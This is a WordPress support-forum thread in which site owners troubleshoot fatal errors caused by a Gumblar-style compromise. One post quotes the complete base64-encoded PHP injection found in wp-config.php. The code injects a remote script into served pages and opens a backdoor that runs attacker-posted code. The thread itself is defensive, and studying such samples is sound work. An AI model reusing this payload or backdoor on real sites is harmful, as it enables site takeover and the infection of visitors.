WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Site crash FATAL ERROR please help (9 posts)

  1. MooiMan
    Member
    Posted 4 years ago #

    Hi all,

    My site crashed for the second time in a few days with a similar error, my designer helped me out last time but he is offline. My website = http://www.pokertips.pro and has the following error: Fatal error: Cannot redeclare xwu5c() (previously declared in /home/pokertip/public_html/index.php(1) : eval()'d code:1) in /home/pokertip/public_html/wp-config.php(1) : eval()'d code on line 1

    What is going on ?
    please help

  2. mrmist
    Forum Janitor
    Posted 4 years ago #

    Sounds as if something has been injected into your index.php and wp-config.php, at the top.

    Take a look at the index.php and wp-config.php file and see if there is anything odd in them.

  3. Shelly2009
    Member
    Posted 4 years ago #

    Same things happened to my blogs a few times this week! I've fixed them and then it happens again.

  4. Gwyn
    Member
    Posted 4 years ago #

    Same thing happened to me twice in the last week. Both times the following was added to wp-config.php :

    <?php eval(base64_decode('aWYoIWlzc2V0KCRnYmExKSl7ZnVuY3Rpb24gZ2JhKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM05wWjJNdVpXUjFMMmxuTDAxQ1FWOURiMjF3YkdGcGJtTmxYM0psY0c5eWRDNXRlVjlrYjJNdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBnYmEyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGdiYTE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGdiYTEpKWNhbGxfdXNlcl9mdW5jKCRnYmExLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2diYScpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdnYmEnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ2JhbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ2JhMicpKSE9J2diYTInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>

    which gave the error:

    Fatal error: Cannot redeclare gba() (previously declared in /home/blablabla/index.php(1) : eval()'d code:1) in /home/blablabla/wp-settings.php(1) : eval()'d code on line 1

    It was a fresh install of 2.8.4. Overwriting all the files with a new download of 2.8.4 and removing that injection code from wp-config sorted it out. But it appears to only be a temporary fix.

    Does anyone know how to fix it for good?

    I'm on shared hosting.

    Thanks!

  5. whooami
    Member
    Posted 4 years ago #

    gwynf,

    I would like to speak to you about installing a plugin that might help track down the source of your problem. if you are interested contact me at help_me_with_wordpress@gmail.com

    actually, this looks like it might be a joomla attack also. so maybe your problem isnt specifically a wordpress issue. I spose I dont really know though.

  6. Gwyn
    Member
    Posted 4 years ago #

    Thanks, there is a Joomla installation on the same server...

    Your email "help_me_with_wordpress@gmail.com" doesn't work though.

  7. whooami
    Member
    Posted 4 years ago #

    i know, sorry, I dont use that very often.

    i would make sure your joomla install isnt the source of the problem though.

    in which case my corrected email addy wont be neccessary.

    help.me.with.wordpress@gmail.com

    my bad.

  8. UseShots
    Member
    Posted 4 years ago #

    These errors are results of buggy Gumblar scripts that doesn't take into account WordPress architecture.

    The attack uses stolen FTP credentials and uploads backdoor scripts that can be used to reinfect compromised sites.

    Details here:
    http://blog.unmaskparasites.com/2009/11/04/gumblar-breaks-wordpress-blogs-and-other-complex-php-sites/

  9. Gwyn
    Member
    Posted 4 years ago #

    UseShots, that's exactly it. Very interesting stuff, great link, much obliged.

    I ended up re-installing from a backup on a completely different server. I've scanned my system for malware with a couple of programs and I always use SFTP, so I suspect it was the other guy (in Peru) using an infected computer. Time will tell. Thanks again.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.